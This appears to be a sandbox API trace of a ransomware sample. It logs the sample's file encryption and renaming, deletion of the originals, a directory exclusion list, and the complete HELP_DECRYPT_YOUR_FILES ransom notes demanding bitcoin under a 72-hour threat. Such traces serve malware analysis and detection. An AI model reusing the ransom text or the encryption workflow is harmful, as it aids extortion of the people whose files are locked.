	[0175.036] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0175.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.038] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.038] CryptHashData (hHash=0xfb9230, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.038] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9230, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0175.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.039] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0175.039] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.039] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0175.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.039] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0175.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.040] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0175.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.040] CryptDestroyHash (hHash=0xfb9230) returned 1
	[0175.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.040] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0175.041] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.041] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.043] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.044] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0175.044] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.044] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0175.047] CloseHandle (hObject=0x39c) returned 1
	[0175.048] CloseHandle (hObject=0x390) returned 1
	[0175.048] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml")) returned 1
	[0175.051] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml")) returned 0
	[0175.052] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.052] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.052] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0175.052] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0175.052] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}"
	[0175.053] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*"
	[0175.053] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.053] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.053] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0175.053] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.054] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.054] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.057] CloseHandle (hObject=0x388) returned 1
	[0175.058] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.059] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.059] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0175.060] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.060] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.060] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.060] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.061] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0175.061] CloseHandle (hObject=0x388) returned 1
	[0175.061] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.061] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.062] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.062] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0175.062] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.064] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.064] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0175.067] CloseHandle (hObject=0x388) returned 1
	[0175.067] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.068] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.068] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.068] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0175.070] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.070] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.070] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.070] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.070] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0175.071] CloseHandle (hObject=0x388) returned 1
	[0175.071] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x81de06ab, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81e06fdf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0175.071] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*") returned 84
	[0175.071] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.072] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*") returned 0x54
	[0175.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.072] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="windows") returned 0x0
	[0175.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.072] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="boot") returned 0x0
	[0175.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.072] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="temp") returned 0x0
	[0175.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="program files") returned 0x0
	[0175.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="appdata") returned 0x0
	[0175.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="application data") returned 0x0
	[0175.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="winnt") returned 0x0
	[0175.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="tmp") returned 0x0
	[0175.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="cache") returned 0x0
	[0175.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="webcache") returned 0x0
	[0175.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="packages") returned 0x0
	[0175.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="cookies") returned 0x0
	[0175.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="programdata") returned 0x0
	[0175.078] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.078] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.078] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x81de06ab, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81e06fdf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.078] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.078] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d94325, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81d94325, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81d94325, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0175.078] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81e06fdf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81e06fdf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81e06fdf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.079] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81de06ab, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81de06ab, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81e06fdf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.079] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81de06ab, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81de06ab, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81de06ab, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0175.079] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.079] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0175.079] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0175.079] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}"
	[0175.079] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\"
	[0175.079] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov"
